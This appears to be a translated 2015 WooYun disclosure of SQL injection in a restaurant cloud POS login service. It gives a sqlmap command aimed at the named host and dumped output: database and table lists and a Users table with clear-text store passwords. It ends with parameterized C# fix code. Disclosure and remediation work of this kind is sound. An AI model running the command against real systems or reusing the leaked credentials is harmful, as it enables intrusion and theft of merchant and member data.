
Vulnerability summary

Defect ID: wooyun-2015-089914

Title: SA-privilege SQL injection in a widely used catering-industry cloud POS management platform (leaks large volumes of account information)

Affected vendor: 上海赫思缔亚信息科技有限公司

Author: JulyTornado

Submitted: 2015-01-04 15:28

Fix time: 2015-04-04 15:30

Disclosure time: 2015-04-04 15:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-04: Details sent to the vendor; awaiting vendor handling
2015-01-09: Vendor confirmed; details disclosed to the vendor only
2015-01-12: Details opened to third-party security partners
2015-03-05: Details disclosed to core white hats and experts in related fields
2015-03-15: Details disclosed to regular white hats
2015-03-25: Details disclosed to intern white hats
2015-04-04: Details disclosed to the public

Brief description:

Young people should read more and not be so flashy; there is too much irrelevant content here. Large volumes of store sales and member information are exposed, so send this through the emergency-response channel...

Detailed description:

[Image: 首页.png (homepage screenshot)]


sqlmap -u "http://cpos168.com/Service.asmx/TryLogin" --data="username=admin&password=admin" -pusername --current-user --is-dba


[Image: sqlmap证明.png (sqlmap proof)]


[Image: sqlmap证明1.png (sqlmap proof, continued)]

Proof of vulnerability:

available databases [73]:
[*] cloudmenu
[*] CloudPOS_AnDongNi
[*] CloudPOS_Ayi
[*] CloudPOS_BaiWeiGuo
[*] CloudPOS_BaLiBaLi
[*] CloudPOS_BingTeLiCoffee
[*] CloudPOS_BolangCoffee
[*] CloudPOS_Cduoduo
[*] CloudPOS_ChaTime
[*] CloudPOS_Chatime_TW
[*] CloudPOS_Config_1
[*] CloudPOS_Demo_Baking
[*] CloudPOS_Demo_Drink
[*] CloudPOS_Demo_Pizza
[*] CloudPOS_Demo_Steak
[*] CloudPOS_FeiNiMoShu
[*] CloudPOS_ganjiangcun
[*] CloudPOS_GFresh_Cartoony
[*] CloudPOS_HaoDaDa
[*] CloudPOS_Hestia
[*] CloudPOS_HongPeiDaShi
[*] CloudPOS_Houxia_20120209
[*] CloudPOS_HuangJiaJiPai
[*] CloudPOS_HuoYuanJia
[*] CloudPOS_HuZaiShan_TW
[*] CloudPOS_Ireland_TW
[*] CloudPOS_JiDong
[*] CloudPOS_Jifentian
[*] CloudPOS_JiPaiChaoRen
[*] CloudPOS_Kongpeisi
[*] CloudPOS_KuBi
[*] CloudPOS_LanZhouJunHe
[*] CloudPOS_LaoTeng_TW
[*] CloudPOS_LeCai
[*] CloudPOS_LiuYiShou
[*] CloudPOS_London8shi
[*] CloudPOS_maishengli
[*] CloudPOS_Maldives_TW
[*] CloudPOS_Member
[*] CloudPOS_MianMianJuDao
[*] CloudPOS_NanFeiMilkTea
[*] CloudPOS_Peidu
[*] CloudPOS_Possmei_20120212
[*] CloudPOS_R_B
[*] CloudPOS_RBYiShi_TW
[*] CloudPOS_RoyalHost
[*] CloudPOS_SanChong_TW
[*] CloudPOS_Shalisha_TW
[*] CloudPOS_ShangJin
[*] CloudPOS_ShaXian
[*] CloudPOS_TBFengQing
[*] CloudPOS_Tosca_TW
[*] CloudPOS_UrbanPark_TW
[*] CloudPOS_WeiQun_TW
[*] CloudPOS_Wuchadao
[*] CloudPOS_XiKe
[*] CloudPOS_XindaoCoffee
[*] CloudPOS_XXCha_TW
[*] CloudPOS_Yadianna
[*] CloudPOS_YaMiPiSa
[*] CloudPOS_YangXinDian_TW
[*] CloudPOS_YangXinDianTemp_TW
[*] CloudPOS_YingTao
[*] CloudPOS_Yuanjiangjun
[*] CloudPOS_YuanShiZu
[*] CloudPOS_ZhaoTianQu
[*] CloudPOS_ZhongLiang
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: CloudPOS_Member
[28 tables]
+-------------------+
| Account |
| BGroupSAT |
| BSATFunction |
| Brand |
| BrandGroup |
| CBasicData |
| CFunction |
| CLevel |
| Card |
| CardExtension |
| DRuleEx_1 |
| DeductRule |
| DeductRule_1 |
| FormatApplication |
| FormatBatch |
| FormatBatch_View |
| FormatTemplate |
| Log |
| Member |
| MemberExpand |
| Member_View |
| RRuleEx |
| RechargeRule |
| Record |
| SATFunction |
| SubAccount |
| SubAccount_Type |
| TemplateFunction |
+-------------------+
Database: CloudPOS_HongPeiDaShi
[159 tables]
+------------------------+
| Area |
| Attendance |
| BProduct |
| BProduct_View |
| BasicData |
| CashRegister |
| CheckOut |
| CheckOutApr |
| CheckOutAug |
| CheckOutBill |
| CheckOutDec |
| CheckOutEed |
| CheckOutFeb |
| CheckOutJan |
| CheckOutJul |
| CheckOutJun |
| CheckOutMar |
| CheckOutMay |
| CheckOutNov |
| CheckOutOct |
| CheckOutSep |
| Client |
| ClientStatus |
| Desktop |
| DocumentFormat |
| Employee |
| ExpandData |
| Feeding |
| FloorArea |
| Functions |
| GiftCertificate |
| GiftCertificateDetail |
| GroupData |
| GroupFunction |
| Groups |
| Headquarters |
| Instruction |
| InvoiceDetail |
| InvoiceDetailApr |
| InvoiceDetailAug |
| InvoiceDetailDec |
| InvoiceDetailFeb |
| InvoiceDetailJan |
| InvoiceDetailJul |
| InvoiceDetailJun |
| InvoiceDetailMar |
| InvoiceDetailMay |
| InvoiceDetailNov |
| InvoiceDetailOct |
| InvoiceDetailSep |
| KeyFunction |
| Log |
| Machine |
| MachineBill |
| ManualInvoice |
| Module |
| OrderCustomer |
| OrderDetail |
| OrderDetailApr |
| OrderDetailAug |
| OrderDetailDec |
| OrderDetailEnd |
| OrderDetailFeb |
| OrderDetailJan |
| OrderDetailJul |
| OrderDetailJun |
| OrderDetailMar |
| OrderDetailMay |
| OrderDetailNov |
| OrderDetailOct |
| OrderDetailSep |
| OrderInformation |
| OrderInformationApr |
| OrderInformationAug |
| OrderInformationDec |
| OrderInformationEnd |
| OrderInformationFeb |
| OrderInformationJan |
| OrderInformationJul |
| OrderInformationJun |
| OrderInformationMar |
| OrderInformationMay |
| OrderInformationNov |
| OrderInformationOct |
| OrderInformationSep |
| OrderMealEnd |
| OrderRecord |
| OrderSubMeal |
| OrderSubMealApr |
| OrderSubMealAug |
| OrderSubMealDec |
| OrderSubMealFeb |
| OrderSubMealJan |
| OrderSubMealJul |
| OrderSubMealJun |
| OrderSubMealMar |
| OrderSubMealMay |
| OrderSubMealNov |
| OrderSubMealOct |
| OrderSubMealSep |
| OrderTable |
| OrderingRecord |
| PTemplate |
| Payment |
| PaymentDetail |
| PaymentDetailApr |
| PaymentDetailAug |
| PaymentDetailDec |
| PaymentDetailEnd |
| PaymentDetailFeb |
| PaymentDetailJan |
| PaymentDetailJul |
| PaymentDetailJun |
| PaymentDetailMar |
| PaymentDetailMay |
| PaymentDetailNov |
| PaymentDetailOct |
| PaymentDetailSep |
| PaymentType |
| PickupBill |
| PickupCustomer |
| Printer |
| Product |
| ProductCategory |
| ProductCategoryFeeding |
| ProductCategorySubMeal |
| ProductCategoryTaste |
| ProductExpand |
| ProductFeeding |
| ProductStore |
| ProductSubMeal |
| ProductTaste |
| Promotion |
| PromotionType |
| PunchCard |
| RegistrationKey |
| Rule |
| RuleContent |
| RuleTemplate |
| STemplate |
| Shift |
| Store |
| StoreDailyReport |
| StoreSet |
| StoreSetStore |
| SubMealGroup |
| SystemSetting |
| TableVersion |
| TakeOutCustomer |
| Taste |
| Template |
| TemplateData |
| TemporaryCustomer |
| TotalOrder |
| UserFunction |
| UserGroup |
| Users |
| VATTax |
| VTemplate |
+------------------------+
Database: CloudPOS_HongPeiDaShi
Table: Users
[9 entries]
+--------------------------------------+----------------+----------+------------+----------------+----------------------+-----------------+
| Users_ID                             | Users_Store_ID | Users_NO | Users_Name | Users_IsEnable | Users_Password       | Users_LoginName |
+--------------------------------------+----------------+----------+------------+----------------+----------------------+-----------------+
| 122D438F-00B4-456B-A1CE-D4D9E2DE54ED | NULL           | ZJ01     | 张江店       | 1              | 123456               | ZJ01            |
| 4731D671-18E8-4D7A-AA86-3B602D0BC8D1 | NULL           | JQ01     | 金桥店       | 1              | JQ01                 | JQ01            |
| 7116B31C-623C-4548-AA2C-871378628267 | NULL           | YZ01     | 扬州店       | 1              | YZ01                 | YZ01            |
| A01824FC-DD30-46D1-A2E9-30D58AC90D6F | NULL           | AD001    | 管理员       | 1              | 123                  | hpds            |
| B5151D7F-443B-4634-961E-31B3205CEFC8 | NULL           | YX01     | 意翔店       | 1              | YX01                 | YX01            |
| C35FAF03-E28E-4481-B137-FF472D855E3C | NULL           | LY01     | 柳营店       | 1              | LY01                 | LY01            |
| C7E5814C-BCBA-4318-8B0E-7EB866E5E35B | NULL           | 01       | test01     | 1              | test                 | test01          |
| E5452673-09DC-4CAE-80D2-93DC2BF1FD49 | NULL           | JJ01     | 靖江店       | 1              | JJ01                 | JJ01            |
| E73D221A-D618-443F-9AE8-19B326074203 | NULL           | SD01     | 江阴时代店     | 1              | SD01                 | SD01            |
+--------------------------------------+----------------+----------+------------+----------------+----------------------+-----------------+


[Image: 会员卡.png (membership card data)]


[Image: 会员卡1.png (membership card data, continued)]


[Image: 10000条数据.png (10,000 records)]

Fix recommendation:

Filter the input...
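Filtering alone is fragile; the durable fix for the TryLogin web method is to stop building SQL from the request fields at all. The following is an added example, not the vendor's code: a parameterized ASMX login method in C# that uses the Users table and the Users_* column names from the dump above. The service class name, the connection-string name, the column length and the password storage format are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;
using System.Web.Services;

// Added example (not the vendor's code). Table and column names follow the dump
// above; the class name, connection-string name and hash format are assumptions.
[WebService(Namespace = "http://example.invalid/cloudpos/")]
public class LoginService : WebService
{
    // Vulnerable pattern this replaces: concatenating the fields into the query text,
    //   "... WHERE Users_LoginName = '" + username + "' AND Users_Password = '" + password + "'"
    // so a crafted username can change the structure of the statement.

    [WebMethod]
    public bool TryLogin(string username, string password)
    {
        if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))
            return false;

        // The user-supplied value travels as a typed parameter, never as SQL text,
        // so the query shape is fixed at compile time.
        const string sql =
            "SELECT Users_Password FROM Users " +
            "WHERE Users_LoginName = @login AND Users_IsEnable = 1";

        string stored;
        // Assumed connection-string name. It should map to a login scoped to this
        // application's database, not sa: the dump reached 73 databases only because
        // the web application itself connected with sysadmin rights.
        using (var conn = new SqlConnection(
                   ConfigurationManager.ConnectionStrings["CloudPOS_App"].ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@login", SqlDbType.NVarChar, 50).Value = username;
            conn.Open();
            stored = cmd.ExecuteScalar() as string;
        }

        // The dump shows clear-text passwords; this assumes they have been migrated
        // to the "iterations.salt.hash" PBKDF2 format produced by HashPassword below.
        return stored != null && VerifyPassword(password, stored);
    }

    // Produces "iterations.base64(salt).base64(hash)" for storage in Users_Password.
    internal static string HashPassword(string password)
    {
        const int iterations = 100000;
        byte[] salt = new byte[16];
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(salt);
        byte[] hash;
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations))
            hash = kdf.GetBytes(32);
        return iterations + "." + Convert.ToBase64String(salt) + "." + Convert.ToBase64String(hash);
    }

    internal static bool VerifyPassword(string password, string stored)
    {
        string[] parts = stored.Split('.');
        if (parts.Length != 3) return false;
        int iterations;
        if (!int.TryParse(parts[0], out iterations) || iterations < 1) return false;
        byte[] salt = Convert.FromBase64String(parts[1]);
        byte[] expected = Convert.FromBase64String(parts[2]);
        byte[] actual;
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations))
            actual = kdf.GetBytes(expected.Length);
        // Constant-time comparison: the loop always runs over the full length so
        // response time does not depend on how many leading bytes matched.
        int diff = actual.Length ^ expected.Length;
        for (int i = 0; i < actual.Length && i < expected.Length; i++)
            diff |= actual[i] ^ expected[i];
        return diff == 0;
    }
}
```

Two points follow directly from the proof section: the `--is-dba` result means the application's database login is a sysadmin, so moving it to a per-database, least-privilege login is part of the fix, and the Users table shows passwords stored in clear, so re-hashing them (as HashPassword above does) removes most of the value of any future dump.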

Copyright notice: please credit the source when reposting: JulyTornado@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-01-09 13:43

Vendor reply:

CNVD has confirmed the vulnerability as described; no direct handling channel with the software vendor has been established yet, so it is pending claim.

Latest status:

None yet

